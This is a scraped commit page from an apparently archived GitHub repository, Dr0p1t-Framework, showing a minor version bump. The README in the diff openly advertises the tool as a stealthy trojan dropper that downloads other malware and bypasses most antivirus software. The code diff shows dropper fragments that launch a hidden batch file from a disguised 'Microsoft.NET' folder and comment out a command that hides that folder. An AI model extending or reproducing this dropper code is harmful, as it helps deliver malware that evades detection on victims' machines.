This repository was archived by the owner on Feb 8, 2020. It is now read-only.
File tree 4 files changed +7
-3
lines changed
4 files changed +7
-3
lines changed Original file line number Diff line number Diff line change
1
+ # Version 1.3.2.1
2
+ # A small fix to the download function
3
+ - Fixed the permission issue that made the dropper not working.
4
+
1
5
# Version 1.3.2
2
6
# Another small update to fix things
3
7
- Fixed the path error in the new download function
Original file line number Diff line number Diff line change 1
- # Dr0p1t-Framework ![ Stage] ( https://img.shields.io/badge/Release-STABLE-brightgreen.svg ) [ ![ Python 3.5] ( https://img.shields.io/badge/Python-3.5-yellow.svg )] ( http://www.python.org/download/ ) [ ![ Python 2.7] ( https://img.shields.io/badge/Python-2.7-yellow.svg )] ( http://www.python.org/download/ ) ![ Build Status] ( https://img.shields.io/badge/Version-1.3.2-red.svg )
1
+ # Dr0p1t-Framework ![ Stage] ( https://img.shields.io/badge/Release-STABLE-brightgreen.svg ) [ ![ Python 3.5] ( https://img.shields.io/badge/Python-3.5-yellow.svg )] ( http://www.python.org/download/ ) [ ![ Python 2.7] ( https://img.shields.io/badge/Python-2.7-yellow.svg )] ( http://www.python.org/download/ ) ![ Build Status] ( https://img.shields.io/badge/Version-1.3.2.1 -red.svg )
2
2
3
3
Have you ever heard about trojan droppers ?
4
4
In short dropper is type of trojans that downloads other malwares and Dr0p1t gives you the chance to create a stealthy dropper that bypass most AVs and have a lot of tricks ( Trust me : D ) ;)
Original file line number Diff line number Diff line change 1
- 1.3.2
1
+ 1.3.2.1
Original file line number Diff line number Diff line change @@ -49,7 +49,7 @@ def get_exe_from(zip):
49
49
xxx = subprocess .Popen ( pthhhh + "\\ Microsoft.NET\\ lolz_service.bat >> NUL" ,shell = True )
50
50
51
51
#xx = subprocess.Popen( "library.exe >> NUL",shell=True,cwd=pthhhh+"\\Microsoft.NET")
52
- xxx = subprocess .Popen ( 'attrib +s +h "Microsoft.NET" >> NUL' ,shell = True ,cwd = pthhhh )
52
+ # xxx = subprocess.Popen( 'attrib +s +h "Microsoft.NET" >> NUL',shell=True,cwd=pthhhh)
53
53
#check architecture
54
54
if arch :
55
55
if architecture ()[0 ][:2 ] == arch : work (zip )
You can’t perform that action at this time.
0 commit comments